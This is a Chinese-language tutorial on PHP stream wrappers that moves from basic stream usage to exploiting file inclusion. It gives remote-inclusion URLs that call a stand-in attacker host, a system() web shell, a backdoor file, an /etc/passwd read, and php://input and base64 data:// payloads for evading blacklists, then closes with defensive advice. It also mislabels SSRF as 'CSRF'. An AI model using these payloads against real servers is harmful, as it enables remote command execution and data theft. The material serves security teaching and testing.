PHP Stream Wrappers的利用技巧是怎樣的

PHP Stream Wrappers的利用技巧是怎樣的，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

流（Streams）這個概念是在php4.3引進的，是對流式數(shù)據(jù)的抽象，用于統(tǒng)一數(shù)據(jù)操作，用于統(tǒng)一數(shù)據(jù)操作，比如文件數(shù)據(jù)、網(wǎng)絡(luò)數(shù)據(jù)、壓縮數(shù)據(jù)等。簡單點講，流就是表現(xiàn)出流式數(shù)據(jù)行為的資源對象。

了解 IT 中的流

當不同的介質(zhì)之間有數(shù)據(jù)交互的時候，就使用流來實現(xiàn)。數(shù)據(jù)源和目標可以是文件，TCP/IP或UDP網(wǎng)絡(luò)連接，標準輸入和輸出，文件服務器上的文件傳輸或文件存檔過程。即使這些流看起來彼此差異很大，但它們卻有一個共同的線程：它們基本上都是讀寫的過程。你可以將數(shù)據(jù)從源寫入到目標，也可以將從源讀取的數(shù)據(jù)傳輸?shù)侥繕?。大致過程如下：

連接建立

數(shù)據(jù)讀取

數(shù)據(jù)寫入

連接結(jié)束

即使基本操作是讀寫，也需要執(zhí)行其他操作才能訪問Web服務器或存檔文件，或是執(zhí)行簡單的輸入和輸出過程，以及通過TCP/IP或UDP建立連接。

流操作中的通用函數(shù)

我們可以通過PHP中的一些通用函數(shù)與流進行交互：

fileopenfwritefclosefile_get_contentsfile_put_contents

在PHP中，你可以使用通用函數(shù)來執(zhí)行各種流操作，而無需使用單獨的函數(shù)，從而使整個過程更加簡單。

直到今天，這些函數(shù)仍是流概念的主要部分并用于文件讀寫過程。我們現(xiàn)在可以在PHP中使用wrapper（包裝器）來執(zhí)行各種流處理，例如HTTP，F(xiàn)TP，SOCKET進程和標準輸入/輸出進程。

如果要使用流，則需要以特定格式指定其類型和目標。我們將在通用函數(shù)中使用的流類型定義如下：

<wrapper>://<target>

<wrapper>占位符用于指定我們將使用的流類型，如File，F(xiàn)TP，PHPOUTPUT，PHPINPUT，HTTP或SSL。

如果你是PHP程序員，你應該熟悉以下代碼。它會讀取some.txt文件并打印其內(nèi)容。

<?php
$handle = fopen("some.txt","rb");
while(feof($handle)!==true) {
   echo fgets($handle);
}

在代碼中，我們使用file://system wrapper調(diào)用fopen通用流函數(shù)。從技術(shù)上講，上面的代碼與以下代碼完全相同：

<?php
$handle = fopen("file://some.txt","rb");
while(feof($handle)!==true) {
   echo fgets($handle);
}

由于流函數(shù)中的默認包裝器是file://，因此如果要使用它，則不必進行指定。

你可以使用以下代碼列出允許使用的包裝器。

<?php
   print_r(stream_get_wrappers());

流上下文概念

對于大多數(shù)用例，流函數(shù)的默認用法可能已經(jīng)足夠。但是在某些情況下，你需要的不僅僅是默認用法。

<?php
file_get_contents(“http://www.example.com/news.php”);

我們假設(shè)可以使用file_get_contents命令來讀取http://www.example.com/news.php上的新聞。但是，如果該網(wǎng)站需要某種形式的身份驗證才能訪問其內(nèi)容呢？在這種情況下，你可以使用流上下文（Stream-Context）規(guī)范使用可選參數(shù)自定義流行為。

以下是一段流上下文的示例代碼：

<?php
   $postdata = '{"username":"ziyahan"}'
   $opts = array('http' =>   array(
           'method' => 'POST',
           'header' => 'Content-type: application/json;charset=utf-8;\r\n'.
               'Content-Length: '.mb_strlen($postdata),
           'content' => $postdata
       )
   );

   $context = stream_context_create($opts);
   $response = file_get_contents('http://www.example.com/news.php', false,
   $context);

如上所示，流上下文實際上是一個數(shù)組。上面的鍵值表示將在上下文中使用的包裝器類型（本例中為HTTP）。每個包裝器都有各自的上下文參數(shù)。你可以在PHP文檔中閱讀有關(guān)它們的更多信息。

PHP 流過濾器

以上我們對流的讀寫過程已有了一個初步的了解。流包裝器的主要優(yōu)點是可以在讀/寫過程中即時的修改，更改或刪除數(shù)據(jù)。

PHP為我們提供了一些流過濾器（string.toupper，string.tolower，string.rot13和string.strip_tags）。除此之外，還可以使用各種自定義過濾器。

我們可以使用stream_append_filter函數(shù)在流上應用過濾器。例如，下面的過濾器會將所有讀取的句子轉(zhuǎn)換為大寫：

<?php
   $handle = fopen('file://data.txt','rb');
   stream_filter_append($handle, 'string.toupper');
   while(feof($handle)!==true) {
       echo fgets($handle);
   }
   fclose($handle);

在data.txt中讀取的信息將以大寫形式顯示在屏幕上。

你還可以使用php://filter wrapper向流添加過濾器：

<?php
   $handle = fopen('php://filter/read=string.toupper/resource=data.txt','rb');

   while(feof($handle)!==true) {
       echo fgets($handle);
   }
   fclose($handle);

流開始傳輸時將調(diào)用該方法。與第一個示例相比，該方法對于之后不允許過濾器附件的函數(shù)（如file()和fpassthru()）更為可行。

你可以使用過濾器進行編碼（rot13，base64）或文件壓縮和提取。

除了PHP和預定義的包裝器之外，你還可以使用第三方包裝器（如Amazon S3或Dropbox），并為特定操作編寫自定義包裝器。

在此之前我們給出的示例屬于本地文件包含（LFI）類目，其中包括將目標系統(tǒng)中的文件包含在代碼中以提取系統(tǒng)的數(shù)據(jù)。

在遠程文件包含中 PHP Wrappers 的使用

除了LFI之外，還可以遠程向Web應用注入代碼，即遠程文件包含（RFI）。

以下是一段示例代碼：

<?php
   include($_GET[“go”].”.php”);

使用這段代碼，你可以使用鏈接瀏覽網(wǎng)站，例如www.example.com/?go=contact和www.example.com/?go=products。

但是，這段代碼有一個根本的缺陷。假設(shè)在遠處的某個服務器中有一個名為malscript.txt的文件，該文件包含以下代碼：

<?php
   phpinfo();

這是包含以上代碼文件的URL：http://www.attacker.com/malscript.txt

然后，攻擊者將調(diào)用以下URL加載該惡意腳本。

www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt
<?php
   include(“http://www.attacker.com/malscript.txt.php”);

開發(fā)人員添加的.php擴展名在此示例中顯示為barrier（屏障）。在RFI攻擊中，想要繞過它非常的容易。

這是攻擊者提供的URL：http://www.attacker.com/malscript.txt?q=。這是攻擊者為了執(zhí)行攻擊而需要訪問的完整URL：

www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt%3Fq%3D
<?php
   include(“http://www.attacker.com/malscript.txt?q=.php”);

使用攻擊URL中的“?q=”字符繞過.php barrier。這只是一個例子，在多數(shù)情況下你可以使用適當?shù)臄U展名托管文件。這個技巧對于服務器端請求偽造攻擊（CSRF）也非常有用。

.txt文件從遠程服務器被注入到PHP函數(shù)中，文本文件中的代碼將作為網(wǎng)站代碼的一部分被執(zhí)行。phpinfo()函數(shù)將為我們顯示服務器的敏感信息。

在該示例當中，我們僅僅只是讀取了服務器的信息。如果我們將其中的代碼更改為其它PHP命令又會發(fā)生什么呢？如下所示：

<?php
   system(“uname -a”)

可以看到，現(xiàn)在我們可以利用RFI執(zhí)行系統(tǒng)命令了。此代碼允許攻擊者通過將其作為GET參數(shù)提供，來執(zhí)行他們想要執(zhí)行的任何命令：

<?php
   system($_GET[“cmd”]);

我們再次使用與前面示例相同的腳本URL：http://www.attacker.com/malscript.txt?q=。但這次我們可以提供一個系統(tǒng)命令作為CMD的GET參數(shù)：

www.example.com/?cmd=uname+-a&go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt?q=

此時，服務器可以根據(jù)攻擊者的請求運行各種命令。

如果無法使用查詢字符串覆蓋 .php extension barrier，則可以使用該擴展名。你需要為此創(chuàng)建一個PHP文件，并在將其上傳到服務器之前包含以下代碼。

以下是backdoor.php文件中的內(nèi)容：

<?php
   echo '<?php system($_GET["cmd"]);?>';

因此，攻擊者需要提供的新鏈接為：http://www.attacker.com/backdoor。這是攻擊者為了執(zhí)行攻擊而需要訪問的鏈接：

http://example.com/?cmd=cat%20/etc/passwd&go=http%3A%2F%2Fwww.attacker.com%2Fbackdoor

PHP將執(zhí)行此代碼：

<?php
   include(“http://www.attacker.com/backdoor.php”);

使用 Stream Wrappers 繞過黑名單列表

如果開發(fā)人員開始采取防御措施并過濾掉了一些輸入，那么我們又該怎么辦？例如，不允許在參數(shù)中使用http://。

其實解決方案很簡單，你可以使用其他選項，例如php://input wrapper，而不是已過濾的http:// wrapper。

在利用RFI漏洞時，如何使用包裝器來獲取POST請求主體的輸入并將其發(fā)送給PHP編譯器呢？

以下是一個請求示例：

POST http://www.example.com?go=php://input%00 HTTP/1.1
Host: example.com
Content-Length: 30

<?php system($_GET["cmd"]); ?>

如上所示，即使過濾掉了http://和file:// wrapper，我們?nèi)匀豢梢允褂胮hp://input wrapper來利用此漏洞。

即使開發(fā)人員將php:// wrapper和允許系統(tǒng)級命令執(zhí)行的其他PHP命令（如system，cmd）列入黑名單，我們?nèi)匀挥修k法覆蓋barriers。在這種情況下，我們可以使用data:// wrapper，其作用是將傳遞給它的輸入作為類型和值傳遞給PHP流函數(shù)。

以上的代碼為：

<?php
 &ampnbsp; system($_GET[“cmd”]);

如果允許使用data:// wrapper，攻擊者只需使用以下代碼而無需托管外部文件：

data://text/plain, <?php system($_GET["cmd"]);

這是最終請求的URL編碼版本：

data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e
http://www.example.com/?go=data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e

使用cmd參數(shù)，任何代碼請求都將被執(zhí)行。例如，想要獲取系統(tǒng)信息，可以使用uname -a命令，但必須先對其進行編碼。

用于攻擊的URL：

http://www.example.com/?cmd=uname+-a&go=data%3a%2f%2ftext%2fplain%2c+<%3fphp+system(%24_GET%5b"cmd"%5d)%3b+%3f>

前面我們已經(jīng)假設(shè)開發(fā)人員將system和cmd等關(guān)鍵字列入了黑名單中。那么，我們有什么可以代替的解決方案呢？

幸運的是data:// wrapper支持base64和rot13編碼。因此，你必須對將用于利用base64中漏洞的PHP代碼進行編碼，并發(fā)出以下請求：

PHP code:

<?php
   system($_GET[“cmd”]);

這是漏洞利用的base64編碼版本。PHP將對其進行解碼并執(zhí)行。

PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

你將發(fā)出請求的URL：

http://www.example.com/?cmd=uname+-a&go=data://text/plain;base64,PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

go參數(shù)下的腳本代碼（base64編碼）已經(jīng)準備好使用“cmd”參數(shù)在操作系統(tǒng)級別執(zhí)行命令。

這里主要介紹了一些PHP Stream Wrappers在滲透測試中的利用技巧，以及讓大家對此有了更為深入的了解。這些包裝器也可以用來繞過某些安全過濾器。正如上面例子中所說的那樣，由于攻擊范圍不斷增加，使用黑名單幾乎已不可能確保安全性。將接收的函數(shù)和文本輸入列入白名單而不是將關(guān)鍵字（如http://，file://，php://，system和cmd）列入黑名單，并在每次發(fā)現(xiàn)新的攻擊媒介時及時的更新它們將更為有效。可以說，效率是保護Web應用程序安全性的關(guān)鍵。

除此之外，你還可以禁用遠程文件包含功能，并且永遠不要讓用戶在可能實現(xiàn)遠程文件包含和執(zhí)行代碼的函數(shù)中控制輸入，例如require，include，require_once，include_once等。

看完上述內(nèi)容，你們掌握PHP Stream Wrappers的利用技巧是怎樣的的方法了嗎？如果還想學到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注億速云行業(yè)資訊頻道，感謝各位的閱讀！